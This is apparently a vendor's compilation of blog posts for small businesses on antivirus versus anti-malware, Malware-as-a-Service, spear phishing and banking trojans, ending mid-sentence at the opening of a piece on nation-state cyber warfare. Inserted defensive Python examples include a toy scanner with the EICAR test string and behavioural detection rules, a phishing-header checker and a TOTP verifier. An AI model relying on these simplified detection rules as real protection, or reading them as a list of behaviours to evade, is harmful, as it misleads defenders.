Antivirus vs anti-malware: what’s the difference?


Antivirus and anti-malware are the basic building blocks of any small and medium-sized enterprise’s (SME) cybersecurity strategy. They’re the most well-known cybersecurity tools, and it’s rare to find a business that doesn’t use at least one.

But do you know what they protect you from, the difference between an antivirus and an anti-malware, and whether you need both? Let’s explore these key talking points.

Malware vs viruses

Before discussing the merits of the two types of software, we must tackle the difference between viruses and malware. Most people assume that the two things are synonymous. Isn’t ‘virus’ just a slightly dated way to say ‘malware’?

That’s almost correct. However, this is the world of cybersecurity, so things are always a little more complicated than they first appear.

The term ‘virus’ describes malicious code that copies itself into other programs or files so that it spreads whenever they are run or shared, much like a biological virus. A virus damages your device by corrupting the system or destroying data. Classic file-infecting viruses are now considered legacy threats: they have existed for decades, and today’s cybercriminals rarely rely on them.

Malware, on the other hand, is an umbrella term covering every kind of malicious software: ransomware, spyware, trojans, worms, and viruses themselves (confusing, we know). Strictly speaking, a virus is one type of malware rather than a separate category. In everyday usage, though, the distinction has come to mean novelty.

The threats people call ‘malware’ are newer, constantly evolving, and very much in use among modern cybercriminals. So antivirus software providers have had to up their game to protect customers.


Antivirus vs anti-malware: the key differences explained

Antivirus

As you might expect, antivirus traditionally deals with older, more established threats, and it finds them by signature: it compares files against a database of known-bad patterns. To illustrate, think of the warnings of the noughties – endless error pop-ups, trojan horses, and worms. These attacks typically enter your business through tried and tested routes such as email attachments, infected USB drives, and other standard delivery methods.

These cyber nasties are generally predictable and easy to counter once a signature exists. However, they can still do plenty of damage if left unchecked.

Anti-malware

Anti-malware software focuses on defending against the latest threats. A good anti-malware product protects your business against ransomware, spyware, the malicious links and attachments used in sophisticated phishing campaigns, and zero-day attacks. Because it leans on behavioural and heuristic detection (watching what a program does, not only what it looks like) and updates its rules faster than a traditional antivirus, it’s the best protection against new threats you haven’t seen before. One caveat: the labels are largely historical. Most modern ‘antivirus’ products are full endpoint-protection suites that do both, so check what a product actually detects rather than relying on the name on the box.
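To make the two detection styles concrete, here is an added example (not code from the original article or from any product) of a toy scanner that layers both: a signature layer that matches known-bad file hashes and byte patterns, and a behaviour layer that scores what a program does at runtime. The EICAR test string is real; the other samples, the runtime events and the scoring rules are constructed for the demo and are deliberately simplistic.

```python
"""Toy layered scanner: a signature layer (traditional antivirus) beside a
behavioural layer (what anti-malware products add). Added example, not a real
product; all samples and events below are constructed, except the EICAR
string, which is the industry-standard harmless test file."""
import hashlib
from dataclasses import dataclass, field

# The real EICAR test string (kept in memory only; writing it to disk will
# trip any installed antivirus, which is exactly what it exists for).
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Layer 1a: exact SHA-256 signatures. Vendors ship these by the million; a
# single changed byte in the file defeats them.
KNOWN_BAD_SHA256 = {hashlib.sha256(EICAR).hexdigest(): "EICAR-Test-File"}

# Layer 1b: byte-pattern signatures survive trivial repacking or padding.
BYTE_PATTERNS = [(b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE", "EICAR-Test-File")]

# Layer 2: behavioural rules (constructed). Each observed event earns a score;
# crossing the threshold blocks the program even if layer 1 matched nothing.
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
RANSOM_EXTENSIONS = (".locked", ".encrypted", ".crypt")
BLOCK_THRESHOLD = 5


@dataclass
class Sample:
    name: str
    content: bytes                               # bytes of the file on disk
    events: list = field(default_factory=list)   # (kind, *args) runtime events


def signature_verdict(content: bytes):
    """Return the matched signature name, or None if nothing known matched."""
    digest = hashlib.sha256(content).hexdigest()
    if digest in KNOWN_BAD_SHA256:
        return "hash:" + KNOWN_BAD_SHA256[digest]
    for pattern, name in BYTE_PATTERNS:
        if pattern in content:
            return "pattern:" + name
    return None


def behaviour_score(events):
    """Score runtime behaviour. Returns (score, reasons)."""
    score, reasons, renamed = 0, [], 0
    for kind, *args in events:
        if kind == "spawn" and args[0].lower() in OFFICE_APPS \
                and args[1].lower() in SCRIPT_HOSTS:
            score += 3
            reasons.append(f"{args[0]} spawned {args[1]}")
        elif kind == "write" and "\\startup\\" in args[0].lower():
            score += 2
            reasons.append("wrote to Startup folder (persistence)")
        elif kind == "rename" and args[1].lower().endswith(RANSOM_EXTENSIONS):
            renamed += 1
    if renamed >= 20:                            # mass rename to a ransom extension
        score += 5
        reasons.append(f"renamed {renamed} files to a ransom extension")
    return score, reasons


def scan(sample: Sample):
    """Layered verdict: signatures first (cheap, precise), then behaviour."""
    sig = signature_verdict(sample.content)
    if sig:
        return "block", sig
    score, reasons = behaviour_score(sample.events)
    if score >= BLOCK_THRESHOLD:
        return "block", "behaviour: " + "; ".join(reasons)
    if score > 0:
        return "suspicious", "behaviour: " + "; ".join(reasons)
    return "allow", ""


# Constructed samples -------------------------------------------------------
KNOWN_SAMPLE = Sample("eicar.com", EICAR)
# Same payload with padding: the hash no longer matches, the pattern still does.
REPACKED_SAMPLE = Sample("eicar_padded.com", EICAR + b"\x00" * 16)
# A never-seen ransomware dropper: no signature, but its behaviour gives it away.
NOVEL_RANSOMWARE = Sample(
    "invoice.docm", b"PK\x03\x04 constructed macro document",
    events=[("spawn", "WINWORD.EXE", "powershell.exe"),
            ("write", r"C:\Users\jo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upd.lnk")]
           + [("rename", f"report{i}.docx", f"report{i}.docx.locked") for i in range(30)],
)
# A legitimate backup tool renames just as many files, but to .bak.
BENIGN_BACKUP = Sample(
    "backup.exe", b"MZ constructed benign binary",
    events=[("rename", f"report{i}.docx", f"report{i}.docx.bak") for i in range(30)],
)

if __name__ == "__main__":
    for s in (KNOWN_SAMPLE, REPACKED_SAMPLE, NOVEL_RANSOMWARE, BENIGN_BACKUP):
        print(f"{s.name:20} {scan(s)}")
```

The padded EICAR sample shows why hash-only signatures are brittle and why vendors add pattern matching; the ‘invoice.docm’ sample shows why even good signatures aren’t enough: nothing in the file is known, but an Office document spawning PowerShell, writing to the Startup folder and renaming dozens of files is blocked on behaviour alone. Real products use far richer telemetry and tuning to avoid flagging the benign backup tool.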

Antivirus vs. anti-malware: which should you choose?

At this point, you might be wondering why you need an antivirus if anti-malware can protect your devices against the most common types of cybercrime.

Although this is a valid question, it’s a risky way to approach cybersecurity. Sure, most of the threats covered by antivirus might be dated and rarely used by the bad guys. However, that doesn’t mean they no longer exist or that they can’t still give you a significant cybersecurity headache.

Doing without antivirus is a bit like a state deciding to focus exclusively on protection from nuclear threats while neglecting the potential for invasion by land. It’s a flawed approach that leaves your business open to attack. Instead, it’s better to take a layered approach to your cybersecurity – by which we mean running protection that covers both signature-based and behavioural detection, whether that’s two products or a single endpoint-protection suite that does both – so your business is protected against new and old threats.

Choosing cybersecurity solutions isn’t an either/or dilemma

Antivirus and anti-malware aren’t mutually exclusive. A truly effective cybersecurity strategy includes tools, training, and measures to counter any threat. Something as simple as a Cyber Essentials certification ensures your business meets the basic requirements to deter cyber threats, because the steps to get qualified cover the scheme’s five technical controls:

  • Firewalls (boundary firewalls and internet gateways)
  • Secure configuration of devices and software
  • User access control
  • Malware protection (the antivirus and anti-malware discussed above)
  • Security update management (patching software and operating systems)

You get support and clear step-by-step instructions for mitigating malware in your business so you don’t overlook any vulnerabilities. Learn how easy it is to get certified today.



Malware-as-a-Service and the rise of DIY cybercrime


Cybercriminals are always looking for the next sophisticated method to target businesses. And as a small business owner, it can sometimes feel impossible to keep up with the latest developments. However, knowledge is power, which is why we bring you regular updates. Let’s explore the latest trends in DIY cybercrime and Malware-as-a-Service, and how to mitigate them. 

What is Malware-as-a-Service?

Malware-as-a-Service (MaaS) is a business model used by cybercriminals known as MaaS operators. MaaS operators lease their malware, the hardware it runs on, and related infrastructure (command-and-control servers, hosting, payment handling) to others for a fee. This lets criminals with minimal coding skills distribute ready-made malware.

You might’ve heard of similar terms like a Software-as-a-Service model, where an end-user purchases a pre-made software solution for their business or personal use. MaaS is the same concept but with malicious software. MaaS operators distribute the software on the dark web and sometimes even provide customer support to nefarious clientele.

Did you know that 47% of SME leaders feel more at risk of a cyberattack since the beginning of the cost of living crisis? Find out why in our latest report.

What is DIY cybercrime?

DIY cybercrime, or do-it-yourself cybercrime, is where a cybercriminal uses a pre-made solution to execute malicious activity. For example, they purchase ready-to-use Malware-as-a-Service, quickly get it up and running, and then use it to distribute malware to their target.

The worrying thing about DIY cybercrime is that anyone can purchase and use an off-the-shelf tool. It has never been easier for criminals to distribute malware, engage in phishing, and more. 

At this point, you might be shaking your head and thinking, ‘D-I-WHY?!’ But don’t worry, all is not lost. You can dramatically reduce the threat to your business by putting the correct cybersecurity solutions in place.

Malware-as-a-Service examples

ZeuS/ZBOT

ZeuS, or ZBOT, is a Windows crimeware kit sold to other criminals, an early example of the MaaS model. It was designed to steal sensitive information such as banking credentials, using keylogging and by injecting extra fields into banking web pages as the victim views them. First detected in 2007, it has been found on machines inside large organisations including Amazon, Bank of America, and NASA.

SpyEye

SpyEye is a banking trojan that infects victims’ devices and steals sensitive data. In a rare case of justice, its creator was caught and, in 2016, sentenced to nine-and-a-half years in US federal prison. However, this hasn’t stopped SpyEye’s code from circulating across the internet.

Blackhole Exploit Kit

Released on an underground Russian hacking forum, the Blackhole Exploit Kit accounted for 29% of all web threats detected in 2012, making it the dominant kit of its day. Its author was arrested in 2013, but the exploit-kit model (a rented web page that probes a visitor’s browser and plugins for unpatched flaws and drops malware without any click) lives on in successor kits, which is one more reason patching matters.

How to prevent Malware-as-a-Service attacks 

Like all criminal activity, MaaS isn’t a threat that’ll soon disappear. But there are several simple steps to protect your business. Here’s what we think you should prioritise.

Educate employees

Most people don’t have in-depth knowledge of malware and DIY cybercrime. Due to the ever-changing nature of cybercrime, your employees must play a part in protecting your business. Make sure people know how to spot a malware attack in your business and provide them with training and resources so they stay informed.

Complete a cybersecurity certification

A cybersecurity certification, like Cyber Essentials, is an excellent way to quickly implement robust security measures in your business. The steps to qualify are themselves practical controls that mitigate malware, not just paperwork, so working through them earns you certification and a stronger baseline at the same time.

Additionally, many companies find that the steps help them identify overlooked vulnerabilities in their business that they might otherwise be unaware of. The scheme’s five technical controls cover:

  • Boundary firewalls and internet gateways
  • Secure configuration of devices and software
  • Managing user access
  • Malware protection
  • Keeping software and operating systems updated

For more information on accreditations, we recommend reading our guide to cybersecurity certifications in the UK.

Monitor your security round-the-clock

Certification is a great starting point for putting in place the right defences and building your cyber confidence. However, cybercriminals won’t only attack on certification day, so you need a way of monitoring your defences year-round. You could approach this manually, but beware it’ll be time-consuming and require familiarity with cybersecurity best practices.

An alternative is to use a cybersecurity monitoring service, like CyberSmart Active Protect, which checks for vulnerabilities around the clock and ensures everyone in your business is working safely. Likewise, a vulnerability management tool can help you get ahead of the latest developments in cybercrime.

Want to know more about the threats facing small businesses like yours? Then have a read of our SME cost of living crisis report. It’s packed full of insight into how small businesses are defending themselves during an economic downturn.


What is spear phishing?


For many people, hearing the phrase ‘spear phishing’ conjures up images of intrepid divers hunting for their dinner in azure seas. However, much like ‘trojan horse’, the term has come to mean something quite different.

According to research, 50% of businesses were victims of spear phishing in 2022, with the typical organisation receiving 5 attacks daily. So the threat is real. But how does a spear phishing attack work? How does it differ from a phishing attack? Most critically, what can your business do to protect itself?

How a spear phishing attack works

Spear phishing is a form of phishing attack. However, unlike the ‘spray and pray’ approach of a conventional attack, spear phishing targets specific individuals, usually within a single organisation. The ‘spear’ in its name reflects this specific targeting.

A spear-phishing attack typically aims to gain privileged access. This is used to steal sensitive data or infect the target (and often their wider network) with malware.

Unlike your common-or-garden phishing attack, spear phishers assiduously research their targets. They do this so that the eventual attack appears to come from a trusted source, such as a boss or client. Spear phishing also uses social engineering techniques to dupe the victim into clicking on a link or granting access. 

Let’s delve a little deeper into how it works.


Anatomy of a spear phishing attack

We’ve established what a spear phishing attack is, but how does one work? Typically, a spear phishing attack has four stages. These are:

1. Goal setting 

The first stage is a simple one. After deciding to turn to crime, the bad guys start by plotting out what they want to achieve with the attack. It could be stealing data they can hold to ransom, diverting a payment, causing disruption, or any of myriad other goals.

2. Picking the target(s)

This stage usually involves a round of preliminary research. Which organisation should they target? Who works at the business they want to target? Are they likely to have access to the data or systems they want to access? Who are the senior leaders within the target organisation? How can they be reached?

These are the questions a cybercriminal will seek to answer as they lay the groundwork. Once they have, it’s time to go a level deeper.

3. Building a profile of the victim(s)

By now, the cybercriminals should have a solid idea of which organisation they want to attack and who within it makes the best targets. Next, it’s a case of getting to know their victims. 

Spear phishers scour social media profiles and platforms like LinkedIn to discover contact details, the victim’s network of family and friends, business contacts, where they shop or bank, and even places they frequent. This information allows cybercriminals to build a rich profile of who the target is, allowing them to tailor the scam specifically to the victim.

4. Initiate contact and use social engineering techniques

Now the scheme has been devised, the cybercriminals launch their attack. Spear phishing emails usually use social engineering techniques such as creating a sense of urgency, trust or authority. The key to a good spear phishing scam is that it appears legitimate: the ‘sender’ is an individual or company the victim regularly deals with, and the message contains at least some authentic information. The technical tricks behind the trusted-sender illusion are usually mundane: a display name copied from a real colleague on an outside address, a lookalike domain (one character swapped in yours), or a Reply-To header that quietly sends replies to the attacker’s mailbox.
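Those sender tricks can be checked mechanically. The following is an added example, not part of the original post, of the kind of header and wording checks a mail filter (or a curious finance team) can run over an incoming message: display-name impersonation, lookalike domains, a mismatched Reply-To, and pressure language. The organisation, the staff directory, the thresholds and both messages are constructed assumptions.

```python
"""Header and wording checks for the 'trusted sender' trick described above.
Added example, not part of the original post. The organisation, staff
directory, thresholds and both messages are constructed assumptions."""
from difflib import SequenceMatcher
from email import message_from_string
from email.utils import parseaddr

OUR_DOMAIN = "example.co.uk"                                # assumed defended domain
KNOWN_STAFF = {"jane smith": "jane.smith@example.co.uk"}   # assumed directory: name -> real address
URGENCY_WORDS = ("urgent", "immediately", "today", "wire", "invoice", "payment", "confidential")
# Digit-for-letter swaps attackers use when registering lookalike domains
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def normalise(domain: str) -> str:
    """Fold common lookalike substitutions so examp1e.co.uk reads as example.co.uk."""
    return domain.lower().translate(HOMOGLYPHS).replace("rn", "m").replace("vv", "w")


def is_lookalike(domain: str, ours: str = OUR_DOMAIN) -> bool:
    """True if domain is not ours but could be mistaken for it."""
    domain = domain.lower()
    if domain == ours:
        return False
    if normalise(domain) == ours:
        return True
    return SequenceMatcher(None, domain, ours).ratio() >= 0.85


def analyse(raw_message: str) -> list:
    """Return a list of spear-phishing indicators found in one RFC 822 message."""
    msg = message_from_string(raw_message)
    findings = []
    name, addr = parseaddr(msg.get("From", ""))
    addr = addr.lower()
    domain = addr.rsplit("@", 1)[-1]

    # 1. Display name of a real colleague on an address that isn't theirs
    real = KNOWN_STAFF.get(name.strip().lower())
    if real and addr != real:
        findings.append(f"display name '{name}' impersonates {real} (actual sender {addr})")

    # 2. Sender domain crafted to look like ours
    if is_lookalike(domain):
        findings.append(f"lookalike sender domain {domain}")

    # 3. Replies silently redirected to an attacker-controlled mailbox
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and reply_to.lower() != addr:
        findings.append(f"Reply-To {reply_to} differs from From {addr}")

    # 4. Pressure and payment language typical of invoice fraud
    body = msg.get_payload() if not msg.is_multipart() else ""
    text = (msg.get("Subject", "") + " " + body).lower()
    hits = [w for w in URGENCY_WORDS if w in text]
    if len(hits) >= 2:
        findings.append("urgency/payment language: " + ", ".join(hits))
    return findings


# Constructed messages ------------------------------------------------------
SPEAR_PHISH = """\
From: Jane Smith <jane.smith@examp1e.co.uk>
Reply-To: jane.smith.ceo@mail-example.com
To: finance@example.co.uk
Subject: Urgent: supplier payment today

Hi, I'm in a meeting and can't talk. Please wire the attached invoice immediately.
"""

LEGITIMATE = """\
From: Jane Smith <jane.smith@example.co.uk>
To: finance@example.co.uk
Subject: Minutes from Monday

Attached are the minutes from Monday's meeting. No action needed.
"""

if __name__ == "__main__":
    for label, raw in (("spear phish", SPEAR_PHISH), ("legitimate", LEGITIMATE)):
        print(label, analyse(raw) or ["no indicators"])
```

None of these checks is proof on its own (a genuine colleague may write ‘urgent’), which is why they are reported as indicators for a human or a scoring policy rather than as an automatic block. In production you would also check the message’s SPF/DKIM/DMARC results, which this example leaves out.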

The most expensive spear phishing attacks of all time

1. Google and Facebook 

This is perhaps the most famous phishing scam of all time. Between 2013 and 2015, Google and Facebook fell prey to a £77m spear phishing campaign. Essentially, a Lithuanian cybercriminal named Evaldas Rimasauskas posed as a Taiwanese hardware manufacturer that supplied both companies, sending fake invoices to key finance and leadership figures within the tech firms.

Rimasauskas was eventually caught but not before he’d managed to defraud two of the largest companies in the world out of an eye-watering sum. 

2. Ubiquiti Networks 

In 2015, networking giant Ubiquiti was hit with a £36.7m spear phishing campaign. According to the company’s statement on the breach, it resulted from “employee impersonation and fraudulent requests from an outside entity targeting the Company’s finance department.” In other words, the company fell victim to a classic spear phishing attack. 

3. Colonial Pipeline 

Of all the incidents on this list, the Colonial Pipeline attack in 2021 is the most sinister. It remains the largest publicly disclosed cyberattack on US critical infrastructure to date. The breach was so serious that the US government treated it as a national security threat.

The attack had several stages. First, the DarkSide group obtained the password for a legacy VPN account. The account was no longer in active use, wasn’t protected by multi-factor authentication, and its password had appeared in an earlier data leak, most likely because an employee had reused it elsewhere.

Next, the attackers used this password to enter Colonial Pipeline’s network, stealing over 100 gigabytes of data in around two hours. They then deployed ransomware that encrypted several systems, including billing and accounting.

We don’t have a definitive figure for how much the breach cost Colonial Pipeline. We know the company paid DarkSide roughly £3.47m for a decryption key. However, the real losses were far larger. Colonial Pipeline carries refined fuel (petrol, diesel and jet fuel) to much of the US East Coast, around 100 million gallons a day, and the attack shut down its operations for the best part of a week, causing fuel shortages across the region.

Spear phishing affects small businesses too 

Although all of the examples above feature globe-bestriding businesses, that doesn’t mean small businesses are safe. Unfortunately, nothing could be further from the truth. According to research, the average employee of a small business experiences 350% more phishing and social engineering attacks than a staff member at a larger enterprise.

Why? Well, while cybercriminals are undoubtedly motivated by the prestige and financial rewards that come with the scalp of a global enterprise, small businesses represent an easier target.

SMEs typically have weaker defences and less developed cybersecurity practices than their corporate counterparts, for one. However, that’s not the only reason. SMEs’ employees can often be turned more easily to a cybercriminal’s malicious ends, whether through actively colluding with criminals or negligence.

Indeed, CyberSmart’s research revealed that 22% of SME leaders believe employees are more likely to make mistakes – such as clicking on a phishing link – since the cost of living crisis began. Meanwhile, 20% believe employees will steal sensitive or proprietary data from the company to sell for profit or a competitive advantage.

How to protect your business 

There’s no denying that small businesses are vulnerable to spear phishing attacks. Nevertheless, becoming a victim of this kind of breach isn’t inevitable. There are plenty of things you can do to ensure your business is protected.

1. Use a VPN 

A virtual private network (VPN) is essential for remote working. If anyone in your business accesses company systems over a network you don’t control, even occasionally, you need one. Untrusted networks such as public Wi-Fi let an attacker on the same network intercept or tamper with traffic, which a VPN counters.

Rather than sending your traffic in the clear, a VPN tunnels it through your own (or a provider’s) servers and encrypts it, so someone snooping on the public network sees only ciphertext. Two caveats. A VPN protects data in transit; it does nothing to stop an employee opening a malicious attachment. And the VPN gateway itself becomes a target: as the Colonial Pipeline case shows, a reused password on a VPN account without multi-factor authentication hands an attacker the front door.

2. Staff training 

As mentioned earlier, spear phishing relies on social engineering techniques, using our human nature against us. This is tricky to counter, but not impossible. Cybersecurity awareness training can help your people recognise when they’re being targeted and give them the skills they need to avoid it, including the habit of verifying any unexpected payment request by phone on a number they already have, never one in the email.

3. Patch all software

Patching is vital and, happily, simple: install the security updates your software providers release, and turn on automatic updates wherever you can. Patching closes the known vulnerabilities cybercriminals exploit to get into your business, including the ones a booby-trapped spear phishing attachment is trying to trigger.

4. Deploy MFA

Multi-factor authentication (MFA) adds an extra layer of security for your business, making it much harder for an attacker who has phished a password to actually use it. You likely already use MFA in some part of your online life; it’s now standard for online banking. If you haven’t already, switch it on for every system or application your business uses, starting with email, remote access (including your VPN) and anything that holds financial data.

5. Protect your network 

Your network is the gateway to your business. It’s what spear phishers are ultimately trying to gain access to when they attack you. Through it, a hacker can reach just about anything your organisation does. So protect it, and protect it well. The four simplest things you can do to strengthen your network immediately are:

  • Install a network firewall to filter traffic in and out
  • Use a VPN to encrypt traffic from remote workers
  • Segment your network so a compromised laptop can’t reach everything (finance systems, servers and guest Wi-Fi don’t belong on one flat network)
  • Regularly update your router’s firmware

6. Always use back-ups 

If the worst does happen and a spear phishing attack leads to ransomware or destroyed data, backups limit the damage. They let you get systems back up and running quickly, and they weaken the cybercriminals’ bargaining power if there’s a ransom demand. Keep at least one copy offline or otherwise out of reach of a compromised account, and test that you can actually restore from it; a backup the attacker can encrypt too is no backup at all.

7. Limit user access

Be careful to limit who has access to what within your business. Users should only have admin rights within a system or application if it’s critical for their role, and even then they shouldn’t use the admin account for everyday email and browsing. The reason is simple: if a cybercriminal compromises a user account through a spear phishing campaign, the fewer permissions that account has, the less damage the attacker can do.

8. Tie it all together 

If the list above appears extensive, don’t fear, there are methods which allow you to tie it all together. The first is to complete a cybersecurity accreditation like Cyber Essentials or ISO 27001 certification. These certifications can help you put in place good cybersecurity practices (including all of the above) and build your cyber confidence.

However, you also need something that keeps your cybersecurity baseline consistently high, year-round. This is where everyday cyber protection tools like CyberSmart Active Protect can help.

Finally, none of this has to cost the earth. For more on how to protect your business on a budget, check out our guide.


What is a banking trojan and how do you stop one?


Zeus, SpyEye, Emotet. What do those names mean to you? As much as they sound like Marvel supervillains, they’re all examples of high-profile banking trojans.

Emerging in the mid-noughties, banking trojans have morphed into one of the most dangerous SME cybersecurity threats. But what are banking trojans? And how can you protect your business from them?

What is a banking trojan?

A banking trojan is a particularly nasty form of trojan horse malware that aims to give cybercriminals access to your online banking credentials and sessions, and often to the wider network the infected machine sits on.

Banking trojans typically come in two forms:

  1. Backdoor trojans: Install a backdoor that gives the attacker remote control of the infected machine, bypassing your security measures.
  2. Spoofers: Steal user credentials by presenting a fake version of a financial institution’s login page, or by injecting extra fields into the real one as you view it.

How do banking trojans work?

A banking trojan works in much the same way as the mythological wooden horse from which it draws its name. A typical banking trojan looks and behaves like legitimate software until you install it. Once it’s on your device, it shows its true colours.

Cybercriminals use banking trojans to:

  • Steal banking credentials
  • Make unauthorised transactions
  • Siphon funds to the attacker’s account


Why are banking trojans so dangerous?

Banking trojans are a particularly hazardous form of malware for several reasons. Firstly, they’re usually well disguised as legitimate software, which makes them difficult to detect for anyone who isn’t a cybersecurity expert.

Secondly, they cause significant damage. In a worst-case scenario, a banking trojan can give cybercriminals total access to your bank accounts, which could spell financial ruin.

How do you know when you’ve been hit? 

Although it can be challenging to spot a banking trojan, it’s not impossible. Like any malware attack, there are a few telltale signs to look out for:

  • Extra or unexpected fields or forms on your online banking pages (asking for your full PIN, card number or one-time code when the bank never would)
  • Poor device performance
  • Slow or broken applications
  • Missing files
  • Unexpected pop-up windows 
  • Tasks running independently
  • Spam originating from your email accounts
  • Your antivirus or anti-malware software stops working

It’s important to note that none of these are conclusive proof that someone’s successfully hacked your system. Think of them as signs that suggest something isn’t quite right. So, if you’re in any doubt, it’s time to call the professionals.

What can you do to protect your business?

Thankfully, protecting your business against banking trojans and similar forms of malware is relatively straightforward. Beyond investing in reliable threat monitoring software, we recommend following these six simple steps.

Use multi-factor authentication 

Multi-factor authentication (MFA) is a security measure that requires two or more different kinds of proof before you can sign in. On top of your username and password (something you know), MFA demands something you have or something you are, such as:

  • A one-time code from an authenticator app on your phone (or, less securely, sent by SMS)
  • A hardware security key you plug in or tap
  • Your fingerprint or face

A second password or ‘memorable word’ isn’t a second factor: it’s still something you know, and a trojan that captures one can capture the other.

The idea behind MFA is simple: the more locks you have on the door, the harder it is for an intruder to break in. Think of it as adding a cyber deadbolt, a door chain lock, and some cameras to keep the bad guys out.
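To show what is going on behind an authenticator-app code (the MFA recommended here and in the spear phishing guidance above), here is an added example, not code from the original article, of time-based one-time passwords as specified in RFC 6238, with a server-side verifier that tolerates a little clock drift and refuses replayed codes. The enrolment and verifier design are this editor’s illustration; the only key in the code is the RFC’s published test vector, not a real secret.

```python
"""Time-based one-time passwords (TOTP, RFC 6238), the mechanism behind
authenticator-app MFA codes. Added example, not from the original article;
the enrolment and verifier design are the editor's own illustration. The
test key below is the RFC's published test vector, not a real secret."""
import base64
import hashlib
import hmac
import secrets
import struct


def hotp(key: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 4226 HOTP: HMAC over the counter, dynamically truncated to `digits`."""
    mac = hmac.new(key, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F                                   # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(key: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP where the counter is the number of 30 s steps since the epoch."""
    return hotp(key, unix_time // step, digits)


def enrol():
    """Server side of enrolment: a fresh secret plus the base32 form that goes
    into the QR code the authenticator app scans. Both sides then hold the secret."""
    key = secrets.token_bytes(20)                             # 160-bit, as RFC 4226 recommends
    return key, base64.b32encode(key).decode().rstrip("=")


class TotpVerifier:
    """Server-side check of a submitted code. Accepts +/-`window` steps of
    clock drift and refuses to accept the same step twice (replay)."""

    def __init__(self, key: bytes, step: int = 30, digits: int = 6, window: int = 1):
        self.key, self.step, self.digits, self.window = key, step, digits, window
        self.last_counter = -1                                # highest step already used

    def verify(self, submitted: str, unix_time: int) -> bool:
        now = unix_time // self.step
        for counter in range(now - self.window, now + self.window + 1):
            if counter <= self.last_counter:                  # already consumed: replay
                continue
            expected = hotp(self.key, counter, self.digits)
            if hmac.compare_digest(expected, submitted):      # constant-time compare
                self.last_counter = counter
                return True
        return False


RFC6238_TEST_KEY = b"12345678901234567890"   # published test vector (SHA-1, 8 digits)

if __name__ == "__main__":
    key, seed = enrol()
    print("provisioning secret (base32):", seed)
    print("6-digit code at t=1700000000:", totp(key, 1_700_000_000))
    v = TotpVerifier(RFC6238_TEST_KEY, digits=8)
    code = totp(RFC6238_TEST_KEY, 59, digits=8)     # RFC 6238 Appendix B: 94287082
    print(code, v.verify(code, 59), v.verify(code, 59))   # True, then False (replay)
```

The phone needs only the shared secret and a clock, so a trojan that steals your password still can’t produce the code; equally, the secret (the QR code) must be guarded as carefully as a password. SMS codes are weaker than this because they travel over a network an attacker can redirect with a SIM swap.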

Train staff how to spot the signs

Human error is often cited as responsible for as much as 90% of cyber breaches, and it’s easy to see why. Few of us are cybersecurity experts, and if you aren’t aware of what a cyber threat looks like, you’re much more likely to find yourself on the receiving end.

Cybersecurity training can bridge this knowledge gap. Training helps staff recognise, understand, and mitigate the threats they face. What this training looks like depends on your business and the knowledge within it. For some, it’s a case of starting from scratch and covering the basics; for others, it’s about addressing specific weak spots.

Patch software regularly 

Patching your software is the simplest way to improve your business’s cybersecurity. Even the best software develops vulnerabilities over time, and developers release security patches to close them before cybercriminals can use them as a route into their clients’ systems.

It’s easy to install these patches. You can check your system for updates every few days or activate the auto-update setting on all company devices.

Use a password manager 

Many banking trojans include keyloggers – programs that record your keystrokes so cybercriminals can steal your PIN or password. A password manager that auto-fills credentials means they are never typed, which takes keyloggers out of the picture, and it will refuse to fill a lookalike phishing site because each saved login is tied to the real domain. It isn’t a complete answer, though: trojans that read web forms or inject fields into the genuine banking page don’t need your keystrokes, so pair it with MFA and your bank’s own controls.

Only download files from trusted sources

This might seem obvious, but if you’re unsure about the origin of a file or piece of software, don’t download it. Set clear rules throughout your business to ensure people only install software from trusted sources, such as the vendor’s own website or the Microsoft, Google, or Apple app stores, and never from a link in an unexpected email. This helps to minimise your exposure to compromised software and malware.

Use all the security features offered by your bank

Banks offer a range of security features. Use them! If your bank provides MFA for sign-in (UK banks are now required to), use it. Many business-oriented banks also offer transaction limits, payment approval by a second person, and alerts for new payees. Use them, too. These little extras are often the difference between cyber safety and falling victim to a banking trojan.

Banking trojan examples to watch out for

Zeus

Active since 2007, Zeus targets Microsoft Windows and steals financial data. It quickly became one of the most successful pieces of malicious software in its class, infecting millions of systems worldwide and giving rise to a host of similar threats. After a brief lull in 2010, when the creator reportedly retired, variants have multiplied since the source code leaked publicly in 2011.

SpyEye

Once touted as the successor to Zeus, SpyEye established itself as one of the most dangerous banking trojans of the early 2010s. SpyEye let its operators steal sensitive information from victims’ bank accounts, including account credentials, credit card details, and PINs. Its Russian creator was sentenced to nine-and-a-half years in prison in 2016.

Emotet

Emotet began life in 2014 as a banking trojan and spreads primarily through email, usually a convincing message with familiar branding that carries a malicious attachment or link. It has gone through several iterations to evade modern detection methods, and later versions stopped stealing banking details themselves and instead acted as a loader, renting out infected machines to other criminal groups (the Malware-as-a-Service model) to drop ransomware and other trojans. Law enforcement disrupted its infrastructure in January 2021, but it resurfaced later that year.

Don’t suffer the same fate as Troy

Understanding the threat banking trojans pose and adopting appropriate countermeasures are integral to safeguarding your financial information in today’s digital landscape.

Simple, inexpensive malware prevention tips – like updating your software regularly, using a password manager, and educating staff – help protect your business against banking trojans and other malware strains, too.

Want to know more about the threats facing small businesses? Check out our new research report on SMEs and the cost of living crisis.


How nation-state cyber warfare affects you


We live in a time of increased international tensions. You can scarcely open a newspaper or browse a news site without being greeted by conflict, both in the real world and online. We’re only two months into 2024 and the National Cyber Security Centre (NCSC) and its international partners have already issued a public warning about state-sponsored attackers.

However, for the average small business or individual, this can seem very distant. Reports on the machinations of states and their security services can all feel ‘a bit James Bond’. Nevertheless, cyber warfare affects everyone. In this blog, we look at cyber warfare and why you should care.

What is nation-state cyber warfare?

Nation-state cyber warfare is best defined as:

